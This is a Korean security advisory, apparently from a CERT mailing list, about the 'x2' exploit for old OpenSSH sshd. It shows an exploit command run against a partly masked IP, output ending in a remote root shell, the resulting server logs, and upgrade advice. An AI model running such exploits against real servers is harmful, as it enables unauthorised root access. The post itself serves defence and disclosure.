[보안] ssh 관련 x2 exploit 에 대하여

아직 패치되지 않은 sshd 를 이용하여 원격에서 root shell 을 획득할 수 있는

“x2”  라는 exploit 이 인터넷상에 공개되었습니다.

default 로 OpenSSH-1.2.2 가 설치되어 있는 레드햇 6.2 계열의 서버에서

테스트해 보았는데, 아래와 같이 원격에서 root shell 을 얻을 수 있었습니다.

아래는 실제 공격예입니다.

# ./ssh-exploit -t1  211.47.xx.xxx 22

password:xxxxxxxx

Target: Small – SSH-1.5-1.2.27

Attacking: 211.47.xx.xxx:22

Testing if remote sshd is vulnerable # ATTACH NOWYES #

Finding h – buf distance (estimate)

(1 ) testing 0x00000004 # SEGV #

(2 ) testing 0x0000c804 # FOUND #

Found buffer, determining exact diff

Finding h – buf distance using the teso method

…..중략……

No Crash, might have worked

Reply from remote: CHRIS CHRIS

***** YOU ARE IN *****

xxx.tt.co.kr

Linux xxx.tt.co.kr 2.4.12 #1 Fri Oct 19 19:05:21 KST 2001 i686 unknown

uid=0(root) gid=0(root)

groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

이 상태는 이미 원격의 root shell 이 열린 상태이며 이 상태에서

hostname; uname -a; id; 를 입력한 것을 볼 수 있습니다.

이때 공격을 당한 서버에 남은 로그입니다.

Dec 16 23:56:27 xxx sshd[17385]: Disconnecting: Corrupted check bytes on

input.

Dec 16 23:56:27 xxx sshd[17387]: Disconnecting: Corrupted check bytes on

input.

Dec 16 23:56:27 xxx sshd[17388]: Disconnecting: Corrupted check bytes on

input.

Dec 16 23:56:27 xxx sshd[17389]: Disconnecting: Corrupted check bytes on

input.

Dec 16 23:56:27 xxx sshd[17391]: Disconnecting: Corrupted check bytes on

input.

Dec 16 23:56:27 xxx sshd[17393]: Disconnecting: Corrupted check bytes on

input.

Dec 16 23:56:28 xxx sshd[17399]: Disconnecting: Corrupted check bytes on

input.

Dec 16 23:56:28 xxx sshd[17426]: Disconnecting: crc32 compensation attack:

network attack detected

Dec 16 23:56:37 xxx sshd[17430]: Disconnecting: crc32 compensation attack:

network attack detected

Dec 16 23:56:41 xxx sshd[17432]: Disconnecting: crc32 compensation attack:

network attack detected

Dec 16 23:56:43 xxx sshd[17433]: Disconnecting: crc32 compensation attack:

network attack detected

Dec 16 23:56:49 xxx sshd[17436]: Disconnecting: crc32 compensation attack:

network attack detected

Dec 16 23:56:51 xxx sshd[17437]: Disconnecting: crc32 compensation attack:

network attack detected

Dec 16 23:56:55 xxx sshd[17439]: Disconnecting: crc32 compensation attack:

network attack detected

Dec 16 23:56:58 xxx sshd[17456]: Disconnecting: Corrupted check bytes on

input.

제가 속한 네트워크를 스캔해 보았는데,

이 exploit에 취약한 시스템이 여럿 있었습니다.

혹, 사용하시는 OpenSSH 버전이 3.0.1 이하이신 분들은

http://www.openssh.com/ 에서 반드시 3.0.2 이상으로

업그레이드하시기 바랍니다.

감사합니다.

   ———————————————————

     sec-info Mailing list 탈퇴를 원하시는분은 메시지 본문에

     다음과 같이 쓰신후 <Majordomo at

certcc.or.kr>로 메일을

     보내 주시면 됩니다.

           unsubscribe sec-info your-mail-address

   ———————————————————

*) openssh-3.0.2p1 소스 설치법을 [리눅스서버] 에 올려놓았습니다.

참고하세요..^^